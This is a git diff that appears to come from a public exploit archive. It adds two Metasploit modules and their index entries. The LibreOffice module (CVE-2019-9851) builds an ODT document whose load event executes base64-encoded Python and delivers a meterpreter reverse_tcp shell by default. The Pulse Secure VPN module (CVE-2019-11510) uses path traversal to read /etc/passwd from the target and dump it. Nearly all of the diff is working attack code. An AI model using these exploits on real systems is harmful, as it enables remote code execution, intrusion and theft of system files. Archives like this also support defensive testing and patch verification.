diff --git a/exploits/multiple/remote/47298.rb b/exploits/multiple/remote/47298.rb new file mode 100755 index 000000000..9c6a86dff --- /dev/null +++ b/exploits/multiple/remote/47298.rb @@ -0,0 +1,74 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = NormalRanking + + include Msf::Exploit::FILEFORMAT + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'LibreOffice Macro Python Code Execution', + 'Description' => %q{ + LibreOffice comes bundled with sample macros written in Python and + allows the ability to bind program events to them. + + LibreLogo is a macro that allows a program event to execute text as Python code, allowing RCE. + + This module generates an ODT file with a dom loaded event that, + when triggered, will execute arbitrary python code and the metasploit payload. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Nils Emmerich', # Vulnerability discovery and PoC + 'Shelby Pace', # Base module author (CVE-2018-16858), module reviewer and platform-independent code + 'LoadLow', # This msf module + 'Gabriel Masei' # Global events vuln. disclosure + ], + 'References' => + [ + [ 'CVE', '2019-9851' ], + [ 'URL', 'https://www.libreoffice.org/about-us/security/advisories/cve-2019-9848/' ], + [ 'URL', 'https://www.libreoffice.org/about-us/security/advisories/cve-2019-9851/' ], + [ 'URL', 'https://insinuator.net/2019/07/libreoffice-a-python-interpreter-code-execution-vulnerability-cve-2019-9848/' ] + ], + 'DisclosureDate' => '2019-07-16', + 'Platform' => 'python', + 'Arch' => ARCH_PYTHON, + 'DefaultOptions' => { 'Payload' => 'python/meterpreter/reverse_tcp' }, + 'Targets' => [ ['Automatic', {}] ], + 'DefaultTarget' => 0 + )) + + register_options( + [ + OptString.new('FILENAME', [true, 'Output file name', 'librefile.odt']), + OptString.new('TEXT_CONTENT', [true, 'Text written in the document. It will be html encoded.', 'My Report']), + ]) + end + + def gen_file + text_content = Rex::Text.html_encode(datastore['TEXT_CONTENT']) + py_code = Rex::Text.encode_base64(payload.encoded) + @cmd = "exec(eval(str(__import__('base64').b64decode('#{py_code}'))))" + @cmd = Rex::Text.html_encode(@cmd) + + fodt_file = File.read(File.join(Msf::Config.data_directory, 'exploits', 'CVE-2019-9848', 'librefile.erb')) + libre_file = ERB.new(fodt_file).result(binding()) + + print_status("File generated! Now you need to move the odt file and find a way to send it/open it with LibreOffice on the target.") + + libre_file + rescue Errno::ENOENT + fail_with(Failure::NotFound, 'Cannot find template file') + end + + def exploit + fodt_file = gen_file + + file_create(fodt_file) + end +end \ No newline at end of file diff --git a/exploits/multiple/webapps/47297.rb b/exploits/multiple/webapps/47297.rb new file mode 100755 index 000000000..1376a19ca --- /dev/null +++ b/exploits/multiple/webapps/47297.rb @@ -0,0 +1,76 @@ +# Exploit Title: File disclosure in Pulse Secure SSL VPN (metasploit) +# Google Dork: inurl:/dana-na/ filetype:cgi +# Date: 8/20/2019 +# Exploit Author: 0xDezzy (Justin Wagner), Alyssa Herrera +# Vendor Homepage: https://pulsesecure.net +# Version: 8.1R15.1, 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4 +# Tested on: Linux +# CVE : CVE-2019-11510 +require 'msf/core' +class MetasploitModule < Msf::Auxiliary + include Msf::Exploit::Remote::HttpClient + include Msf::Post::File + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Pulse Secure - System file leak', + 'Description' => %q{ + Pulse Secure SSL VPN file disclosure via specially crafted HTTP resource requests. + This exploit reads /etc/passwd as a proof of concept + This vulnerability affect ( 8.1R15.1, 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4 + }, + 'References' => + [ + [ 'URL', 'http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11510' ] + ], + 'Author' => [ '0xDezzy (Justin Wagner), Alyssa Herrera' ], + 'License' => MSF_LICENSE, + 'DefaultOptions' => + { + 'RPORT' => 443, + 'SSL' => true + }, + )) + + end + + + def run() + print_good("Checking target...") + res = send_request_raw({'uri'=>'/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/'},1342) + + if res && res.code == 200 + print_good("Target is Vulnerable!") + data = res.body + current_host = datastore['RHOST'] + filename = "msf_sslwebsession_"+current_host+".bin" + File.delete(filename) if File.exist?(filename) + file_local_write(filename, data) + print_good("Parsing file.......") + parse() + else + if(res && res.code == 404) + print_error("Target not Vulnerable") + else + print_error("Ooof, try again...") + end + end + end + def parse() + current_host = datastore['RHOST'] + + fileObj = File.new("msf_sslwebsession_"+current_host+".bin", "r") + words = 0 + while (line = fileObj.gets) + printable_data = line.gsub(/[^[:print:]]/, '.') + array_data = printable_data.scan(/.{1,60}/m) + for ar in array_data + if ar != "............................................................" + print_good(ar) + end + end + #print_good(printable_data) + + end + fileObj.close + end +end \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index c7686fef7..c3b9f4375 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -17636,6 +17636,7 @@ id,file,description,date,author,type,platform,port 47243,exploits/php/remote/47243.py,"Agent Tesla Botnet - Arbitrary Code Execution",2019-08-13,prsecurity,remote,php, 47244,exploits/php/remote/47244.py,"AZORult Botnet - SQL Injection",2019-08-13,prsecurity,remote,php, 47256,exploits/php/remote/47256.rb,"Agent Tesla Botnet - Arbitrary Code Execution (Metasploit)",2019-08-14,"Ege Balci",remote,php, +47298,exploits/multiple/remote/47298.rb,"LibreOffice < 6.2.6 Macro - Python Code Execution (Metasploit)",2019-08-21,LoadLow,remote,multiple, 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php, 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php, 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php, @@ -41618,6 +41619,7 @@ id,file,description,date,author,type,platform,port 47199,exploits/php/webapps/47199.txt,"WebIncorp ERP - SQL injection",2019-08-01,n1x_,webapps,php,80 47203,exploits/hardware/webapps/47203.html,"Cisco Catalyst 3850 Series Device Manager - Cross-Site Request Forgery",2019-08-01,"Alperen Soydan",webapps,hardware,80 47204,exploits/php/webapps/47204.txt,"Sar2HTML 3.2.1 - Remote Command Execution",2019-08-02,"Cemal Cihad ÇİFTÇİ",webapps,php,80 +47297,exploits/multiple/webapps/47297.rb,"Pulse Secure 8.1R15.1/8.2/8.3/9.0 SSL VPN - Arbitrary File Disclosure (Metasploit)",2019-08-21,"Alyssa Herrera",webapps,multiple, 47205,exploits/php/webapps/47205.txt,"Rest - Cafe and Restaurant Website CMS - 'slug' SQL Injection",2019-08-02,n1x_,webapps,php,80 47206,exploits/php/webapps/47206.txt,"1CRM On-Premise Software 8.5.7 - Persistent Cross-Site Scripting",2019-08-02,"Kusol Watchara-Apanukorn",webapps,php,80 47210,exploits/php/webapps/47210.txt,"WordPress Plugin JoomSport 3.3 - SQL Injection",2019-08-07,"Pablo Santiago",webapps,php,80